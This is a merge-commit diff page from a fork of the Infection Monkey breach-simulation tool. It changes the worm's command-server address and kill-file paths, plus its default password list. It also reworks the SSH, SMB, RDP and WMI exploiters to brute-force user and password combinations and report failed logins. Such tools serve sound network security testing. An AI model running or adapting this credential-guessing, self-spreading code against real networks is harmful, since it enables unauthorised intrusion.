p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/guardicore/monkey 

# Conflicts:
#	monkey_island/deb-package/monkey_island_pip_requirements.txt
This commit is contained in:
itsikkes 2016-08-10 19:31:27 +03:00
parent 0ce9a164a9 1e13671ebd
commit f1857a04f8
13 changed files with 78 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
chaos_monkey/config.py
View File

@ -110,8 +110,8 @@ class Configuration(object):
########################### ###########################
# Kill file # Kill file
########################### ###########################
kill_file_path_windows = os.path.expandvars("%temp%\~df4150.tmp") kill_file_path_windows = os.path.expandvars("%windir%\monkey.not")
kill_file_path_linux = '/tmp/user-4150' kill_file_path_linux = '/var/run/monkey.not'
########################### ###########################
# monkey config # monkey config
@ -147,7 +147,7 @@ class Configuration(object):
#Configuration servers to try to connect to, in this order. #Configuration servers to try to connect to, in this order.
command_servers = [ command_servers = [
"127.0.0.1:5000" "41.50.73.31:5000"
] ]
# sets whether or not to locally save the running configuration after finishing # sets whether or not to locally save the running configuration after finishing
@ -194,7 +194,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"] psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter # ssh exploiter
ssh_user = "root" ssh_users = ["root"]
ssh_passwords = ["Password1!", "1234", "password", "12345678"] ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter # rdp exploiter

11
chaos_monkey/example.conf
View File

@ -1,6 +1,6 @@
{ {
"command_servers": [ "command_servers": [
"russian-mail-brides.com:5000" "41.50.73.31:5000"
], ],
"internet_services": [ "internet_services": [
"monkey.guardicore.com", "monkey.guardicore.com",
@ -37,8 +37,9 @@
"dropper_target_path": "C:\\Windows\\monkey.exe", "dropper_target_path": "C:\\Windows\\monkey.exe",
"dropper_target_path_linux": "/bin/monkey", "dropper_target_path_linux": "/bin/monkey",
"kill_file_path_linux": "/tmp/user-4150",
"kill_file_path_windows": "%temp%\\~df4150.tmp", "kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not",
"dropper_try_move_first": false, "dropper_try_move_first": false,
"exploiter_classes": [ "exploiter_classes": [
"SSHExploiter", "SSHExploiter",
@ -68,7 +69,9 @@
"serialize_config": false, "serialize_config": false,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
"skip_exploit_if_file_exist": true, "skip_exploit_if_file_exist": true,
"ssh_user": "root", "ssh_user": [
"root"
],
"local_network_scan": true, "local_network_scan": true,
"tcp_scan_get_banner": true, "tcp_scan_get_banner": true,
"tcp_scan_interval": 200, "tcp_scan_interval": 200,

5
chaos_monkey/exploit/rdpgrinder.py
View File

@ -13,7 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from model.host import VictimHost
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from tools import build_monkey_commandline from tools import build_monkey_commandline,report_failed_login
__author__ = 'hoffer' __author__ = 'hoffer'
KEYS_INTERVAL = 0.1 KEYS_INTERVAL = 0.1
@ -295,6 +295,9 @@ class RdpExploiter(HostExploiter):
exploited = True exploited = True
host.learn_credentials(self._config.psexec_user, password) host.learn_credentials(self._config.psexec_user, password)
break break
else:
#failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"

7
chaos_monkey/exploit/smbexec.py
View File

@ -6,7 +6,7 @@ from exploit import HostExploiter
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from network import SMBFinger
from tools import build_monkey_commandline from tools import build_monkey_commandline,report_failed_login
try: try:
from impacket import smb from impacket import smb
@ -88,9 +88,12 @@ class SmbExploiter(HostExploiter):
host.learn_credentials(self._config.psexec_user, password) host.learn_credentials(self._config.psexec_user, password)
exploited = True exploited = True
break break
else:
#failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Exception when trying to copy file using SMB to %r with user"
" %s and password '%s': (%s)", host, " %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc) self._config.psexec_user, password, exc)
continue continue

33
chaos_monkey/exploit/sshexec.py
View File

@ -1,12 +1,13 @@
import paramiko import paramiko
import monkeyfs
import logging import logging
from tools import build_monkey_commandline import time
from itertools import product
import monkeyfs
from tools import build_monkey_commandline,report_failed_login
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from network.tools import check_port_tcp from network.tools import check_port_tcp
import time
__author__ = 'hoffer' __author__ = 'hoffer'
@ -43,31 +44,35 @@ class SSHExploiter(HostExploiter):
return False return False
passwords = list(self._config.ssh_passwords[:]) passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user) users = list(self._config.ssh_users)
if known_password is not None: known_passwords = [host.get_credentials(x) for x in users]
if known_password in passwords: if len(known_passwords) > 0:
passwords.remove(known_password) for known_pass in known_passwords:
passwords.insert(0, known_password) if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) #try first
user_pass = product(users,passwords)
exploited = False exploited = False
for password in passwords: for user, curpass in user_pass:
try: try:
ssh.connect(host.ip_addr, ssh.connect(host.ip_addr,
username=self._config.ssh_user, username=user,
password=password, password=curpass,
port=port, port=port,
timeout=None) timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)", LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password) host, user, curpass)
host.learn_credentials(self._config.ssh_user, password) host.learn_credentials(user, curpass)
exploited = True exploited = True
break break
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host, " %s and password '%s': (%s)", host,
self._config.ssh_user, password, exc) user, curpass, exc)
report_failed_login(self,host,user,curpass)
continue continue
if not exploited: if not exploited:

7
chaos_monkey/exploit/tools.py
View File

@ -415,3 +415,10 @@ def build_monkey_commandline(target_host, depth):
cmdline += " -d %d" % depth cmdline += " -d %d" % depth
return cmdline return cmdline
def report_failed_login(exploiter, machine, user, password):
from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
'exploiter': exploiter.__class__.__name__,
'user':user,'password':password})

8
chaos_monkey/exploit/wmiexec.py
View File

@ -6,7 +6,8 @@ from tools import build_monkey_commandline
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost from model.host import VictimHost
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login
from impacket.dcerpc.v5.rpcrt import DCERPCException
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
@ -49,6 +50,11 @@ class WmiExploiter(HostExploiter):
LOG.debug("Failed connecting to %r using WMI with password '%s'", LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password) host, password)
continue continue
except DCERPCException, exc:
report_failed_login(self, host, self._config.psexec_user, password)
LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password)
continue
except socket.error, exc: except socket.error, exc:
LOG.debug("Network error in WMI connection to %r with password '%s' (%s)", LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
host, password, exc) host, password, exc)

6
chaos_monkey/main.py
View File

@ -66,6 +66,12 @@ def main():
print "Loaded Configuration: %r" % WormConfiguration.as_dict() print "Loaded Configuration: %r" % WormConfiguration.as_dict()
#Make sure we're not in a machine that has the kill file
kill_path = WormConfiguration.kill_file_path_windows if sys.platform == "win32" else WormConfiguration.kill_file_path_linux
if os.path.exists(kill_path):
print "Kill path found, finished run"
return True
try: try:
if MONKEY_ARG == monkey_mode: if MONKEY_ARG == monkey_mode:
log_path = os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" else WormConfiguration.monkey_log_path_linux log_path = os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" else WormConfiguration.monkey_log_path_linux

2
chaos_monkey/readme.txt
View File

@ -49,7 +49,7 @@ Linux (Tested on Ubuntu 12.04):
sudo pip install paramiko sudo pip install paramiko
sudo pip install psutil sudo pip install psutil
sudo pip install netifaces sudo pip install netifaces
sudo pip install https://github.com/pyinstaller/pyinstaller/releases/download/3.0.dev2/PyInstaller-3.0.dev2.tar.gz sudo pip install PyInstaller
sudo apt-get install winbind sudo apt-get install winbind
2. Put source code in /home/user/Code/monkey/chaos_monkey 2. Put source code in /home/user/Code/monkey/chaos_monkey
3. To build, run in terminal: 3. To build, run in terminal:

12
monkey_island/deb-package/monkey_island_pip_requirements.txt
View File

@ -1,5 +1,11 @@
python-dateutil
tornado
werkzeug
jinja2
markupsafe
itsdangerous
click
bson
flask flask
Flask-Pymongo Flask-Pymongo
Flask-Restful Flask-Restful
python-dateutil
tornado

9
monkey_island/linux/kali/monkey-island.service
View File

@ -1,9 +0,0 @@
[Unit]
Description=Monkey Island Service
[Service]
WorkingDirectory=/var/monkey_island/cc
ExecStart=/usr/bin/python main.py
[Install]
WantedBy=multi-user.target

9
monkey_island/linux/kali/monkey-mongo.service
View File

@ -1,9 +0,0 @@
[Unit]
Description=Monkey Island Mongo Service
[Service]
WorkingDirectory=/var/monkey_island/
ExecStart=/var/monkey_island/bin/mongodb/bin/mongod --dbpath db
[Install]
WantedBy=multi-user.target

14
monkey_island/requirements.txt
View File

@ -1,7 +1,11 @@
python-dateutil
tornado
werkzeug
jinja2
markupsafe
itsdangerous
click
bson
flask flask
Flask-Pymongo Flask-Pymongo
Flask-Restful Flask-Restful
python-dateutil
impacket
pycrypto
tornado